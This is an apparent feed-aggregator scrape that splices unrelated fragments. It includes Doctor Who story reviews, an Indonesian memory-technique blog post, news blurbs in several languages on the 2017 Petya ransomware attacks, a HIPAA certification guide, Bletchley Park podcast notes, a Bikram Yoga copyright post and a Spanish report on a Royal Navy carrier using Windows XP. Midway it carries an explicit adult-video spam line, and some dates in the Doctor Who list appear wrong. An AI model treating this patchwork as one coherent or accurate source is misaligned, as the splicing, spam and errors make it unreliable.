Writer: Derrick Sherwin (ep 1) and Peter Ling (ep 2-5)
Of the two B/W era episodes available on Netflix, this narrowly gets precedence over the other, if anything for the boldly experimental plot and the boundary-pushing special effects (some that work, others that don't). The TARDIS lands outside of the known Universe, in the Land of Fiction, in which anything can happen depending on the imagination of the controller. Thanks to the 'anything goes' structure, the story is even able to absorb the temporary loss of one of the companions, when Fraser Hines' illness kept Jamie out of episode Two. It was too late to re-write the script, so a brilliantly unique solution was devised...

14. The Aztecs (1964, 4 episodes)
Doctor: William Hartnell
Companions: Susan, Ian and Barbara
Writer: John Lucarotti
Probably the best of the surviving Hartnell era stories. For the first four seasons, the series alternated between science fiction-focused and history-focused stories. In the latter, the Doctor & Co. would land in Earth's past, get separated from the TARDIS, interact with famous people or critical moments in history, and attempt to escape without A) Getting Killed or B) Changing History. They land in an Aztec tomb which closes behind them, shutting them off from the TARDIS. The Aztecs hail Barbara as a re-incarnated goddess since she'd grabbed a bracelet off a corpse while in the tomb (um, eww...). Barbara appalls the Doctor and incites the wrath of the Aztec shaman by denouncing the practice of human sacrifice. Meanwhile, the Doctor has to woo the widow of the tomb's architect to find a way back to the TARDIS, Ian makes an enemy of the warrior chief, and Susan tries to avoid getting married. In the end they get out alive, but leave a considerable mess behind - shattered faith, spilled blood and broken hearts.

15. The Pirate Planet (1977, 4 episodes)
Doctor: Tom Baker
Companion: Romana I
Writer: Douglas Adams (under the pen-name David Agnew)
Part Two in the Key To Time saga, this one's a mixed bag. A lot of great sci-fi concepts and a witty script, a fantastic villain in The Captain, and a nice twist at the end, but underdone by a weak supporting cast, some sloppy production work, and Tom Baker's alternately indifferent, silly, or over the top acting.

16. The Androids of Tara (1977, 4 episodes)
Doctor: Tom Baker
Companion: Romana I
Writer: David Fisher
Part Four of the Key To Time saga. The plot: Prisoner of Zenda, with androids in it. And a really, really, REALLY stupid looking Taran Wood Beast, so stupid looking that it almost hobbles the entire story even though it's on screen for maybe five seconds. The villainous Count Grendel is fun, and the climactic swordfight is sufficiently swashbuckly, but meh.

17. The Power of Kroll (1977, 4 episodes)
Doctor: Tom Baker
Companion: Romana I
Writer: Robert Holmes
Part Five of the Key to Time saga. Doctor Who attempts King Kong, but with a giant squid. Not Robert Holmes' best script by any measure, hampered further by budgetary limitations and miscasting (though it is fun to watch Philip Madoc visibly seething that he's not playing Thawn).

18. The Visitation (1982, 4 episodes)
Doctor: Peter Davison
Companion: Nyssa, Tegan, Adric
Writer: Eric Saward
Saward has his fans, but we're not among them. The Terleptyl looks great, but there's nothing else memorable about him. Since the plot centers around the Great Plague and Great Fire of London, we'll bet Saward intended to set it in 1660's London, but the budget confined him to a nearby village with an apparent population of five. And the plot is one of the most egregious examples of capture, escape, re-capture. The vagabond actor Richard Mace is memorable, but that's about all there is here. There's no action. None. Just wandering around and talking for four episodes, with three crap cliffhangers in between. Others seem to rate this highly, but to us, it's a dud.

COMING SOON: The Best Dr Who Episodes Not On Netflix

Teknik Super Memory dengan Menggunakan "Anatomi"

super_brain-2_indonesiajenius.comPernah mengalami sulitnya menghafal pelajaran, di baca berulang ulang tapi masih lupa.? Atau mungkin teman-teman pernah mencari solusinya di google dengan memasukan kata kunci seperti ini :
Cara belajar, Belajar cepat, Panduan belajar, Belajar efektif, Strategi belajar, tips belajar, teknik belajar, Cara cepat belajar, Cara belajar bahasa, Cara mudah belajar, Cara belajar efektif, Cara belajar yang, Belajar yang baik. Jika ia inilah jawabanya :
Yaitu teknik super memory dengan menggunakan teknik anatomi.

Berikut adalah contohnya :
Untuk mengetahui bagaimana teknik ini bekerja, sebelumnya silahkan Anda Hafalkan daftar kata berikut secara berurutan hanya dengan membacanya sekali s
aja :


Jika Anda sudah selesai selanjutnya, coba ingat kembali daftar kata yang teman-teman ingat dengan berurut. Berapa kata yang mampu Anda ingat?

Cara mudah untuk mengingat daftar kata di atas adalah dengan menggunakan fungsi kedua belah otak teman-teman, yaitu otak kiri dan otak kanan. Salah satu fungsi otak kiri yang akan kita gunakan adalah “Urutan” sedangkan fungsi otak kanan adalah “Imaginasi”. Dan menggunakan ketiga gaya belajar, yaitu visual (penglihatan) audiovisual (pendengaran) kinestetik (gerakan atau perasaan). Kemudian menggunakan satu prinsip memori lagi yaitu mengkaitkan sesuatu yang baru dengan dengan sesuatu yang lama yang sudah kita tahu dengan imajinasi. Dalam teknik Anatomi ini, sesuai dengan namanya kita akan menggunakan angota badan kita atau bagian dari tubuh kita. Sebagai sesuatu yang sudah kita tahu.


  1. Peganglah rambut teman-teman kemudian bayangkan setiap helai rambut teman-teman menjadi jarum. Kemudian katakan sampai teman-teman mendengar suara teman-teman sendiri “ini adalah jarum”.
  2. Sentuh dua titik di kepala teman-teman dengan jari teman-teman, kemudian bayangkan dan katakan “disinis tumbuh tanduk dari pulpen”.
  3. Kedipkan mata teman-teman, bayangkan dan katakan “bola mata saya dari buah anggur”.
  4. Pegang telinga teman-teman kemudian bayangkan dan katakan “ini adalah biscuit”.
  5. Pencet hidung teman-teman bayangkan dan katakan “saya menutup lubangnya dengan tisu”.
  6. Gerakan gigi teman-teman, bayangkan dan katakan “gigi saya setajam gergaji”.
  7. Kembungkan pipi teman-teman, bayangkan dan katakan “ini adalah balon”.
  8. Pegang tenggorokan teman-teman, bayangkan dan katakan “ini adalah selang”.
  9. Gerakkan pundak teman-teman, bayangkan dan katakan “di sini ada ayam yang hinggap”.
  10. Pegang lengan teman-teman, bayangkan dan katakan “lengan ini hangus terbakar api”.
  11. Gerakkan jari teman-teman, bayangkan dan katakan “jari ini adalah lilin”.
  12. Todongkan jari telunjuk teman-teman kearah kepala teman-teman.
  13. Bayangkan dan katakan “ini adalah pistol, Dorr..”.
  14. Pegang perut teman-teman, bayangkan dan katakan “ini adalah sebuah gallon.
  15. Pegang pinggang teman-teman, bayangkan dan katakan” saya dililit ular”.
  16. Pegang pusat teman-teman, bayangkan dan katakan “pusat ini bocor dan mengeluarkan air kopi”.
  17. Pegang kedua lutut teman-teman, bayangkan dan katakan “lutut ini tertusuk paku”.
  18. Pegang mata kaki teman-teman, bayangkan dan katakan “disini tertempel koin”.
  19. Gerakkan jari-jari kaki teman-teman, bayangkan dan katakan “jari-jari ini memanjang dan tumbuh menjadi akar”.

Sekarang saatnya teman-teman menghafalnya satu persatu-satu dengan cara menggerakan atau memegang secara berurut anggota badan teman-teman, yang tadi teman-teman gunakan, mulailah memegang rambut teman-teman hingga menggerakan jari-jari kaki teman-teman. Pada saat yang bersamaan ingatlah setiap kata yang tadi teman-teman kaitkan. Dan tulis di bawah ini berapa yang teman-teman ingat, bandingkan dengan sebelumnya, ketika teman-teman belum menggunakan teknik ini :

Ciri-ciri virus adalah sebagai berikut :

  1. Merupakan mikro organisme dengan ukuran 20-300 milimikron.
  2. Sebagai mahluk hidup sekaligus benda mati.
  3. Dapat berkembang biak dengan menduplikasi diri.
  4. Susunan tubuhnya adalah Protein dan ARN/ADN.
  5. Hanya dapat hidup pada medium hidup (sel hidup).
  6. 6. Bentuknya bulat,oval,memanjang,batang, dan bentuk T.


  1. Kepala, pegang, bayangkan dan katakan kepala teman-teman mengecil hingga 20-300 milimikron, mengingatkan teman-teman pada ukuran virus.
  2. Pundak, pegang, bayangkan dan katakan dipundak kanan teman-teman ada burung yang masih hidup terjangkit virus dan di pundak kiri teman-teman ada burung mainan yang juga terjangkit virus, ini memgintakan teman-teman bahwa virus adalah mahluk hidup dan benda mati.
  3. Tangan, pegang, bayangkan dan katakan. tangan teman-teman menduplikasi menjadi 4, mengingatkan teman-teman pada perkembang biakan virus dengan menduplikasi diri.
  4. Dada, pegang, bayangkan, dan katakan di dada teman-teman ada banyak jerawat karena terlalu banyak Protein. Mengingatkan teman-teman pada susunan tubuh virus.
  5. Perut, pegang, bayangkan dan katakan di perut teman-teman ada tulisan ADN/ARN, Mengingatkan teman-teman pada susunan tubuh virus.
  6. Pinggang, pegang, bayangkan dan katakan di pinggan teman-teman ada ular yang sudah terinfeksi virus dan masih hidup, mengingatkan teman-teman bahwa virus hanya hidup pada medium hidup.
  7. Jari kaki,pegang, bayangkan, dan katakan, jari-jari kaki teman-teman berbentuk sbb. Jempol : menjadi bulat, jari telunjuk kaki : oval, jari tengah teman-teman menjadi sangat panjang, jari manis kaki teman-teman : jari kelingking kaki teman-teman : berbentuk T. Ini mengigatkan teman-teman pada bentuk-bentuk virus.

Sekarang tanpa melihat kembali, tuliskan berapa banyak cirri-ciri virus yang teman-teman ingat?

Hasilnya pasti memuaskan, teknik ini hanya sebagian kecil dari apa yang saya dapatkan tentang cara belajar cepat.., masih ada 13 teknik mengingat lagi, ada juga cara membaca dengan sengat cepat, cara mencatat dengan kedua belah otak, semua ini saya tidak dapatkan di sekolah…,

          CyberSecurity Engineer - Black Box Network Services - Lawrence, PA   
This position is for a senior engineer in the CyberSecurity department. The role will be responsible for designing, building, and participating in core...
From Black Box Network Services - Wed, 07 Jun 2017 20:18:04 GMT - View all Lawrence, PA jobs
          Campeões de verdade precisam de diferenciais para se firmarem   
Não esperem aqui uma resenha do jogo Confiança 2 x 2 Santos. Isso você encontrará de sobra na net. E também nem vislumbre que nas linhas seguintes traçarei um histórico do time de juniores do Confiança. Se quiser dados técnicos, eles também abundam no cyber-universo.

Aqui só focarei em uma questão: o que é que forma uma equipe de verdadeiros campeões? Treino e disciplina são básicos em qualquer esporte. Talento, nato ou desenvolvido, também marca a vida de qualquer atleta. E podem ter certeza de que as dificuldades da vida, quando insistentemente combatidas, também contribuem para o sucesso.

Combinamos, então, que esses ‘detalhes’ fazem parte da receita vencedora desde sempre. Mas esses pontos, juntos e bem trabalhados, por si só não garantem a vitória. Há que se ter um molho, um toque diferenciado.

Pois bem, na minha opinião – e gostaria de saber a sua também – o ‘dedo de Midas’ a abrilhantar atletas ou equipes vencedoras de verdade, independente do resultado final, se dá com a presença de duas coisas fundamentais: personalidade e fé. E o catalisador disso tudo, no time do Confiança, tem nome: o técnico Lima, um guerreiro que já merece ser imortalizado no capenga futebol sergipano.

A propósito: o Confiança volta a jogar na Copinha no dia 9, às 14h, contra o São Carlos, e no dia 12, às 16h, contra o Atlético-AC. Acompanhe as partidas e entenda porque, independente de qualquer outra coisa, inclusive dos resultados, Lima é o maior nome do nosso futebol.

          Your Law Firm Got Hacked. What Do You Do Now   

A four-step guide to how law firms can limit their exposure to further cyber theft and legal liabilities after an attack.


          Fall of Cybertron. Metroplex Trailer   
          Fall of Cybertron   
          Cyber Fuck Buddies Meet For Real   
Watch Cyber Fuck Buddies Meet For Real at - best free online XXXPorn videos for you to enjoy.
          Le virus Petya serait-il originaire d'Ukraine?   
Le Bureau fédéral allemand de la sécurité informatique, la cyberpolice ukrainienne et les spécialistes d'ESET sont d'avis que la cyberattaque d'ampleur qui a frappé la veille de nombreux serveurs dans le monde pourrait s'être propagé via le programme de comptabilité M.E.Doc, largement utilisé en Ukraine.
          Condamné ou acquitté en ligne? C’est maintenant possible en Chine   
En Chine, le premier tribunal entièrement en ligne va bientôt voir le jour dans la province du Zhejiang. Logiquement, le tribunal se consacrera uniquement aux cas liés au cyberespace.
          Cyberattaque mondiale: Kiev accuse la Russie, pourtant touchée elle aussi   
Des dizaines d'entreprises et d'institutions européennes, notamment en Russie et en Ukraine, ont subi une vaste attaque virale.
          Les cyberattaques d’hier n’ont pas causé de dommages importants aux entreprises russes   
Les cyberattaques massives qui ont sévi hier en Russie n’ont pas gravement nui au fonctionnement des entreprises commerciales et des entreprises publiques, a déclaré le 28 juin aux journalistes le porte-parole du Président russe Dmitri Peskov.
          Cyberattaque Petya: la NSA impliquée?   
Des experts américains en cybersécurité estiment que la récente attaque au virus extorqueur Petya contre des sociétés à travers le monde a été réalisée grâce à des instruments de piratage élaborés par la NSA.
          «Virus-Président»? Les réseaux sociaux réagissent au virus Petya   
Après qu'une cyberattaque d'envergure a touché mardi des entreprises dans plusieurs pays, tels que la Russie, l'Ukraine, la France, l'Espagne et d'autres, les internautes ont eux aussi voulu s'exprimer sur le sujet.
          La centrale nucléaire de Tchernobyl touchée par le virus informatique Petya   
La centrale nucléaire de Tchernobyl complète la liste des entreprises et société frappées ce mardi par une cyberattaque, ce qui a conduit au passage en mode manuel du monitorage de radiation. Aucun risque n'existe cependant.
          Un tiers des cyberattaques contre la Russie lancées depuis les États-Unis   
Selon le membre du Conseil de la Fédération Konstantin Kossatchev, près d'un tiers des cyberattaques contre la Russie sont réalisées depuis le territoire des États-Unis.
          Le pire ennemi du dernier porte-avions anglais, sous Windows XP, sera-t-il le hacker?   
Six ans de construction et presque quatre milliards d’euros de dépenses plus tard, le porte-avions amiral britannique HMS Queen Elizabeth prend enfin la mer… sous Windows XP. Avec ce logiciel obsolète, le plus grand porte-avions britannique est une cible facile pour les cyberattaques.
          La cyberattaque Petrwrap relance la crainte des rançongiciels   
L’attaque semblait perdre en vigueur mercredi, après avoir infecté plus de 2.000 utilisateurs dans le monde. Le filon a de l’avenir : d’autres « logiciels de destruction massive » circuleraient actuellement dans la nature.
          Cyberattaque mondiale Petya : une solution trouvée   
Quelques heures après le démarrage de cette vague massive de rançongiciel, un chercheur en cyber-sécurité aurait trouvé un moyen de ralentir la progression du virus.
          Benhamou Global Ventures Closes Third Venture Capital Fund, at $80M   
Benhamou Global Ventures, a Palo Alto, CA- and Tel Aviv, Israel-based early-stage venture capital firm, closed its third fund, at $80m. BGV III’s limited partners include several unnamed American, European and Chinese investors. The fund focuses on making investment in enterprise IT including cyber security, cloud-based infrastructure services and applications, web scale infrastructure, advanced analytics […]
          Cyberattacken Petya: Det här vet vi   
Vad gör viruset? Varifrån kommer det? Vad är motivet?
          Cybersäkerhetsexpert: Stäng genast av datorn om du misstänker cyberattack   
Den cyberattack som på tisdag spreds över hela världen nådde också Finland. Viruset som kallas Petia slog först till i Ukraina och Ryssland, och fortsatte sedan till resten av Europa och Nordamerika. Petia, är ett så kallat ransomware (utpressningsprogram).
          What 2 Things Do You Need to Know About HIPAA Certification?   

All US healthcare professionals are required to obtain their Health Insurance Portability and Accountability Act (HIPAA) certification in order to ensure a transparent and efficient medical system. Read below to find out more about the various types of HIPAA certification exams and about the curriculum you need to prepare for each one of them.

• HIPAA Certification Curriculum:

In order to be able to pass the HIPAA exams and receive a certificate validating their knowledge, trainees have to study a certain curriculum. The curriculum includes an introduction to HIPAA, detailing its enactment, regulations, and goals, an introduction to the HIPAA Privacy Rule, other advanced privacy topics, HIPAA Security, standards for electronic transactions, administrative safeguards, and physical and technical safeguards.

People wanting to obtain a HIPAA Specialist certificate will have to prepare a more extensive curriculum. The topics they will have to learn include regulatory compliance and security, financial security and services, Payment Card Industry Data Security Standard (PCI DSS) requirements, digital healthcare and security, International Organization for Standardization (ISO) standards, US State Government Requirements, business continuity planning, and cyber security strategy.

These training modules are offered by various healthcare training companies and they are often bundled up in courses called HIPAA Basic and HIPAA Advanced, according to the type of certificate each healthcare worker needs to obtain. If you cannot find the right bundle of courses you need for your HIPAA certification, contact the training company to see if they can provide you with the exact curriculum you need for your exam.

• Types of HIPAA Certifications:

There are three types of HIPAA Certification exams healthcare professionals can sign up for, according to what job responsibilities they have. The easiest exam, the Certified HIPAA Administrator or CHA for short, is meant for people working in the healthcare industry who do not have access to confidential health data. In order to pass this exam, trainees will only have to prepare some basic information about HIPAA and the Privacy Rule, or, in other words, the HIPAA Basic training course.

The Certified HIPAA Professional (CHP) is an exam created for healthcare professionals who have direct contact with patient records. In order to be able to pass it, applicants will have to undergo the HIPAA Advanced training course, which also focuses on security requirements apart from the Privacy Rule. Candidates for the CHP exam will also have to prove their knowledge in topics such as electronic transactions and administrative, physical, and technical safeguards.

The third and most complex exam, the Certified Security Compliance Specialist or CSCS, is designed for security officers, compliance professionals, compliance managers, privacy officers, security officers, and senior IT staff. This certificate validates a healthcare professional's knowledge and skills in areas like information security, legislations, frameworks, and international standards.

These are some of the most important things any healthcare professional should know about how HIPAA certification works. If you are still not sure which certificate is suitable for you, contact a senior manager in your institution or any HIPAA training company for more information.

          Bletchley Park Presents Gordon Corera   
September 2015 On 18 October the BBC’s Security Correspondent, Gordon Corera, will give a talk at Bletchley Park about his new book which traces the intertwined history of computing and espionage, Intercept – The Secret History of Computers and Spies. The computer was born to spy. Under the intense pressure of the Second World War and in the confines of Bletchley Park, the work of men like Alan Turing and Tommy Flowers led to the birth of the computing age. It was a breakthrough that helped win the war and which cemented the importance of signals intelligence and also a close alliance between the US and UK. In the following decades, computers transformed espionage from Cold War spy hunting and providing advance warning of nuclear war through to today’s data driven pursuit of terrorists and industrial scale cyber-espionage against corporations. Gordon Corera reveals for the first time how – beginning at Bletchley - the history of computers has been shaped by spying and in turn how spying has been changed by computers. He will look at the legacy of Bletchley and how it matters for us all. He told the Bletchley Park Podcast how a book about technology turned out to be a book about people. Tickets are available from the Bletchley Park online shop #BPark, #Bletchleypark, #Enigma, #History
          Free School Trips To Bletchley Park   
February 2015 Bursaries for disadvantaged schools have Been added to Bletchley Park’s expanding education programme Winton Global Investment Management is funding a pilot bursary scheme to allow free school trips to Bletchley Park. Bletchley Park welcomes more than 9,000 schoolchildren every year to its thriving education programme. The bursaries will be available to schools which might be most in need of financial support. Each bursary will cover the cost of coach hire and 40 children attending two workshops during their time at Bletchley Park. The first school to participate in the scheme was Greenleys Junior School in Milton Keynes. A group of year six students were given a Codes and Ciphers workshop, tried their hands at operating a real World War Two Enigma machine and toured the uniquely historic site. Victoria Worpole, the Bletchley Park Trust’s Director of Learning and Collections, says “These bursaries will help enormously by making exciting and engaging school trips to Bletchley Park available to children to whom it might have been out of reach. It’s vital that we inspire young minds. Encouraging children to put themselves in the Codebreakers’ shoes to solve seemingly impossible problems brings the STEM subjects to life.” The scheme forms part of a greatly improved education programme at Bletchley Park. Cyber Security Workshops are now available either as part of a school visit or at the school itself, since the appointment of the first Online Safety Officer. Schools, colleges, clubs or societies can book an Enigma Outreach visit, where Bletchley Park’s Education Officer demonstrates a real World War Two Enigma machine which participants can try using themselves. Picture: ©ShaunArmstrong/ #Bletchleypark, #Enigma, #BPARK, #STEM
          E25 - Inspiring Women   
August 2014 This month’s episode is all about Inspiring Women. We first take you to the launch of McAfee’s Cyber Security Exhibition and Computer Learning Zone which was held in the ballroom. The focus is on Online Safety for all ages, but especially children, as well as encouraging more women to Cyber Security. We have highlights of the speeches from McAffee’s Ross Allen & Raj Samani, Natalie Black of The Cabinet Office & Bletchley Park Trust Chairman Sir John Scalett, as well as interviews with our own Online Education Officer Nicola Halls & Veteran Betty Webb. You can find out more at Next we bring you a Q&A session held at the end of our most recent Bletchley Park Presents Event – The Real Women of Bletchley Park. Historian & Bletchley Park guide Bob Horner, put questions from the sell-out audience to four Veterans, Ruth Bourne, Gwendolyn Page, Jean Valentine & Betty Webb. Finally we bring you a truly serendipitous & heart-warming conversation between the Architect who led the restoration of Bletchley Park and the Hut 6 Veteran who inspired her. Architect Janie Price literally bumped into Veteran Jane Fawcett during the recent visit of HRH The Duchess of Cambridge. Jane was Janie’s tutor in building conservation at the Architectural Association and was an expert in historic flooring. * A message from mcfontaine * The sound on The Real Women Package is not up to our usual high quality due to a technical problem that was completely out of our control on the day, but we have improved it as much as possible & felt we should include it because of the importance of the content. We hope it doesn’t spoil your enjoyment. Picture: Janie Price meeting HRH The Duchess of Cambridge ©shaunarmstrong/ In memory of Jane Fawcett, who passed away on 21 May 2016. #BPark, #Bletchleypark, #ww2veteran, #enigma, #McAfee, #cyberhero
          Sir John Scarlett - McAfee Cyber Security Exhibit Launch   
June 2014 McAfee, part of Intel Security, today announced the official opening of its international Cyber Security Exhibition and Computer Learning Zone at Bletchley Park, as part of its five-year collaborative partnership with the home of the World War Two Codebreakers. Sir John Scarlett gave a speech on the impact and importance of Bletchley Park, online safety and the role of women in Cyber Security. Picture: ©shaunarmstrong/ #BPark, #Bletchleypark, #enigma, #McAfee, #AudioMo,
          Extra - E29 - Women in Cyber Security   
November 2013 In October Cyber Security Challenge UK & Raytheon held an event called Today, Then & Tomorrow. It looked at the role of women in cyber security, celebrating the Bletchley Park Veterans, leading figures of today & a look into the future. Here is a flavour of the day featuring Natalie Black, Stephanie Daman, Baroness Pauline Neville-Jones, Dr Brooke Hoskins, Clare McBrearty, Lucy Robson & Bletchley Park Podcast’s, very own, Kerry Howard. #BPark, #Bletchleypark, #cybersecurity, #thentodaytomorrow, #Raytheon, #CyberChallenge, #mcfontaine
          E16 - Frogs over the Air   
November 2013 This month, with so much happening at Bletchley Park recently, we have to bring you an extended episode. First we grab Hard-Hats & Hi Viz Jackets to join Conservation Architect Janie Price & Site Manager Rob Davies to get an in-depth update on the HLF Restoration of Bletchley Park, from floorboards to granite floors, via the roof. In October Bletchley Park hosted Are You Listening? The event looked at the history of communications. We spoke to members of Milton Keynes Amateur Radio Society, the British Vintage Wireless Society & the Vintage & Military Amateur Radio Society. Also in October Cyber Security Challenge UK & Raytheon held an event called Today, Then and Tomorrow. It looked at the role of women in cyber security, celebrating the Bletchley Park Veterans, leading figures of today & a look into the future. Katherine spoke to Natalie Black of the Cabinet Office, after we found out just what her job title was. We will bring you the rest of this fascinating day in Podcast EXTRA’s – E29 (out on 24/11/13). Final join us as we walk around with two amazing Veterans, Norah Boswell, a Wren Bombe Operator who was stationed at Stanmore & Joyce Roberts, a WAAF Teleprinter Operator at Bletchley Park. Look out for Podcast EXTRA’s – E30 (out on 31/11/13) for even more from what was a great day for us all. You can find … Milton Keynes Amateur Radio Society at British Vintage Wireless Society at Vintage & Military Amateur Radio Society at Picture: ©mcfontaine #BPark, #BletchleyPark, #Bombe, #radio, #AmatureRadio, #ham, #hamradio, #MKARS, #BVRS, #VMARS, #thentodaytomorrow, #audiowrangler, #mcfontaine
          Corporations, governments hit by cyberattack   

A global wave of cyberattacks that began in Russia and Ukraine on Tuesday wrought havoc on government and corporate computer systems as it spread to Western Europe and across the Atlantic.

Several multinational companies said they were targeted, including US pharmaceutical giant Merck, Russian state oil giant Rosneft, British advertising giant WPP and the French industrial group Saint-Gobain.

The first reports of trouble came from Ukrainian banks, Kiev's main airport and Rosneft, in a major incident reminiscent of the recent WannaCry virus.

Some IT experts identified the virus as “Petrwrap”, a modified version of the Petya ransomware which hit last year and demanded money from victims in exchange for the return of their data.

But global cybersecurity firm Kaspersky Lab said: “Our preliminary findings suggest that it is not a variant of Petya ransomware as publically reported, but a new ransomware that has not been seen before,” which it named “NotPetya”.

The cyberattack also recalled a ransomware outbreak last month which hit more than 150 countries and a total of more than 200,000 victims with the WannaCry ransomware.

'Spreading round the world'

The virus is “spreading around the world, a large number of countries are affected,” Costin Raiu, a researcher at the Moscow-based Kaspersky Lab said in a Twitter post.

In the United States, Merck was hit as was New York law firm of DLA Piper.

“We confirm our company's computer network was compromised today as part of a global hack. Other organisations have also been affected,” Merck said on Twitter.

“It seems to be done by professionals criminals, and I think money is the motivation,” said Sean Sullivan, a researcher at the Finnish cybersecurity group F-Secure.

He said that unlike the recent WannaCry attack, this “Petrwrap” attack has sophisticated elements that could make it easier to rapidly infect many more systems.

'Powerful' attack

Ukrainian Prime Minister Volodymyr Groysman wrote on Facebook that the attacks in his country were “unprecedented” but insisted that “important systems were not affected.”

However, the radiation monitoring system at Ukraine's Chernobyl nuclear site has been taken offline after it was targeted in the attack, forcing employees to use hand-held counters to measure levels, officials said Tuesday.

The technological systems were working “as usual” at the plant that exploded in 1986, however.

The attacks started around 2:00 pm Moscow time (1100GMT) and quickly spread to 80 companies in Ukraine and Russia, said cybersecurity company Group IB.

The companies affected were hit by a type of ransomware that locks users out of the computer and demands purchase of a key to reinstate access, Group IB said.

The cryptolocker demands $300 in bitcoins and does not name the encrypting program, which makes finding a solution difficult, Group IB spokesman Evgeny Gukov said.

Ukraine's central bank said several lenders had been hit in the country, hindering operations and leading the regulator to warn other financial institutions to tighten security measures.

Banks were experiencing “difficulty in servicing customers and performing banking operations” due to the attacks, the bank said in a statement.

Rosneft said earlier that its servers suffered a “powerful” cyberattack but thanks to its backup system “the production and extraction of oil were not stopped.” The wave of cyberattacks also impacted Maersk, a global cargo shipping company; Saint-Gobain, a French company producing glass and other construction materials; and British-based WPP.

In Amsterdam, the Dutch parcel delivery company TNT, which operates in 200 countries around the world,said its systems had been affected. “We are assessing the situation and are implementing remediation steps as quickly as possible,” the company, part of FedEx, said in a statement to AFP.

Signs of sophistication

Experts also said this latest attack could heighten fears that companies may be more vulnerable to cyberattacks than suspected, potentially putting personal data at risk.

“This will undeniably affect trust in these organisations and raise questions of competency,” said Louis Rynsard, a director at the corporate communications agency SBC London.

“The long-lasting impact of a cyberattack cannot be overstated,” he said.

The fight against cyberattacks has sparked exponential growth in global protection spending, with the cyber security market estimated at $120 billion this year, more than 30 times its size just over a decade ago. But even that massive figure looks set to be dwarfed within a few years, experts said, after ransomware attacks crippled computers worldwide in the past week.

          Director, Enterprise Cyber Security - Esterline - Bellevue, WA   
Familiarity with web related technologies (Web applications, Web Services, Service Oriented Architectures) and of network/web related protocols....
From Esterline - Tue, 27 Jun 2017 19:38:15 GMT - View all Bellevue, WA jobs
The health care system cannot deliver effective and safe care without deeper digital connectivity. If the health care system is connected, but insecure, this connectivity could betray patient safety, subjecting them to unnecessary risk and forcing them to pay unaffordable persona …
          Cyber Security in Healthcare; A Different Virus Altogether   
Not long ago, businesses were protected with locks on doors and windows. It was a simpler time and, sadly, it is a time that has come and gone in this modern age of cyber warfare. If the recent WannaCry ransomware attacks are any indication, now more than ever, businesses and ins …
          Utilizing Strong Cyber Hygiene for Ransomware Preparation   
The WannaCry ransomware attack was a wakeup call for healthcare organizations across the globe, especially with the UK’s National Health Service being severely impacted from the attack. This is further proof why strong cyber hygiene is necessary for entities to pr …
          Giuliani: No Trump Appointment: Dream is to Solve The Cyber Security Problem   
"Former NYC Mayor Rudy Giuliani says he is not interested in being a part of President-elect Donald Trump’s Administration.""He told the FOX Business Network’s Maria Bartiromo on Friday that he would rather focus on finding a solution to the mounting global cyber secu …
          The Bikram Yoga Copyright Battle   
By Caitlin Lee Dempsey Traditional knowledge encompasses and protects the unauthorized use of images, music, and choreography, among other categories, and has become a hot topic among copyright and intellectual property lawyers. Yoga exemplifies the current controversy, which concerns Bikram Choudhury's copyrighted series of 26 yoga poses, famously to be known as "Bikram Yoga", which was registered in 2007. Choudhury designed a 9-week intensive course for aspiring Bikram Yoga teachers, encouraging them to help teach others how powerful and healing yoga may be - as long as they followed his rules (i.e. strict text, mirrors and carpets in the studio, and specific temperature, among others). However, what happens when one of Bikram's former students opens a studio that almost follows his precise guidelines, to the former student's own benefit? Recently, Choudhury faced just that, and filed eight causes of action against the founder of Yoga to the People, Gregory Gumicio. The complaint alleged copyright infringement, trademark infringement, false delegation of origin, dilution, unfair competition, unfair business practices, breach of contract and inducing breach of contract. Choudhury's claims varied from injunction to over $1,000,000 for each allegation. Gumicio, who entered into an agreement restricting his use of "Bikram Yoga" when he successfully completed Bikram's course, did not claim to be offering Bikram Yoga. He responded to the allegations with, and argued that while copyright is limited to original works and systems, which is the category under which yoga would fall, yoga does not constitute "choreography" in the traditional sense of the word, and therefore cannot be copyrighted. While the U.S. Copyright Office has permitted yoga poses to be registered in the past, regulators recently reviewed the legislative history of copyright law and decided that exercise, such as yoga, does not "constitute the subject matter that Congress intended to protect as choreography." Moreover, Gumicio has a different take on the agreement he signed upon completion of the course. The diploma says that he "is hereby granted rights and privileges to teach Birkam's Basic Yoga System", which Gumicio does not believe includes the drastic limitations that Choudhury is claiming. This is not the first case Bikram has taken to court on the matter. Prior suits ended with private settlements, with the defendants agreeing not to use Choudhury's name. Choudhury also brought suit against Evolution Yoga and Yen Yoga with similar claims. Moreover, Choudhury has an ongoing battle with Take Back Yoga of the American Hindu Foundation, which demands that Yoga's Hindu Philosophy remains alive.
This post originally appeared on the Entertainment, Arts and Sports Law Section blog.
          Запчасть Shimano к Cyber Nexus SW-8S40 правый и левый переключатели для FS/RS KSW8S40A   
Запчасти к Cyber Nexus Shimano SW-8S40, крепеж, переключатели правый: 8 скоростей, левый: амортизация, для FS/RS.
          El portaaviones más grande y potente en la historia del Reino Unido tiene un pequeño problema: usa Windows XP   

Hms Queen Elizabeth 02

El enorme HMS Queen Elizabeth es el más reciente buque de guerra de la Royal Navy del Reino Unido, el cual acaba de realizar su primer paseo de demostración después de ocho años de trabajos. Se trata del portaaviones más grande jamas construido y ello significa un gran despliegue de tecnología y potencia, sino fuera por un pequeño detalle.

Según el Times de Reino Unido y The Guardian, quienes fueron invitados a este primer paseo, en los ordenadores que sirven para operar algunas de las funciones del buque se podía ver que usaban Windows XP como sistema operativo. Sí, algo que está encendiendo las alarmas debido al potencial riesgo de seguridad que esto significa.

Software de 2001

El HMS Queen Elizabeth tuvo un coste de 4.500 millones de dólares y tiene una longitud de 280 metros, esto le da la capacidad de transportar hasta 40 aviones F-35 y una tripulación de hasta 1600 personas.

Sin embargo, todas las bondades que busca mostrar la Royal Navy se han visto opacadas por la decisión de usar Windows XP en los sistemas de buque, y más al ver los recientes problemas de seguridad con el ransmoware WannaCry que afectó parte del sistema de salubridad del Reino Unido.

Hms Queen Elizabeth

Mark Deller, comandante del portaaviones, comentó lo siguiente:

"Cuando compras un barco, no lo compras hoy, lo compraste hace 20 años. Así que lo que tenemos disponible para trabajar cuenta con especificaciones que probablemente eran lo mejor en aquel entonces. La realidad es que siempre estamos trabajando con piezas recicladas, de modo que siempre estamos ante la tarea de modificar y actualizar."

Por otro lado, Deller no fue capaz de mencionar el porqué se decidió usar este operativo en un buque de este tipo, pero se cree que se trata de sistemas informativos empleados en viejos buques de guerra, los cuales han sido probados y han demostrado su efectividad.

Hms Queen Elizabeth

